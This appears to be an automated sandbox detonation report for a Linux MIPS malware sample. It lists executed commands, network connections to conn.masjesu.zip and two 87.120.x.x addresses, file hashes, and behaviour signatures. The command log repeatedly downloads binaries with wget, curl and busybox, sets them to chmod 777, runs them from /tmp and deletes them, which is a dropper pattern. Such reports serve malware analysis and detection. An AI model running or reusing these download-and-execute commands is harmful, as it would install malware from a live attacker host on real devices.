[./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/bin/rm
[rm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/chmod
[chmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ
[./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/bin/rm
[rm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/chmod
[chmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S
[./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/bin/rm
[rm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/chmod
[chmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A
[./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/bin/rm
[rm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/chmod
[chmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv
[./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/bin/rm
[rm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/chmod
[chmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp
[./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/bin/rm
[rm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/chmod
[chmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4
[./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/bin/rm
[rm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/chmod
[chmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7
[./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/bin/rm
[rm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/chmod
[chmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw
[./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/bin/rm
[rm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/chmod
[chmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn
[./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
/bin/rm
[rm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| BG | 87.120.126.196:80 | conn.masjesu.zip | tcp |
Files
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-10-18 03:08
Reported
2024-10-18 03:11
Platform
debian9-mipsel-20240418-en
Max time kernel
109s
Max time network
111s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | N/A |
| N/A | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | N/A |
| N/A | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | N/A |
| N/A | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | N/A |
| N/A | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | N/A |
| N/A | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | N/A |
| N/A | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | N/A |
| N/A | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | N/A |
| N/A | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | N/A |
| N/A | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | N/A |
| N/A | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | N/A |
| N/A | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | N/A |
| N/A | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | N/A |
| N/A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | N/A |
| N/A | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL | N/A |
| N/A | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK | N/A |
| N/A | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB | N/A |
| N/A | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I | N/A |
| N/A | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O | N/A |
| N/A | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ | N/A |
| N/A | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S | N/A |
| N/A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A | N/A |
| N/A | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv | N/A |
| N/A | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp | N/A |
| N/A | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | N/A |
| N/A | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 | N/A |
| N/A | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | N/A |
| N/A | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw | /usr/bin/curl | N/A |
| File opened for modification | /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 | /usr/bin/curl | N/A |
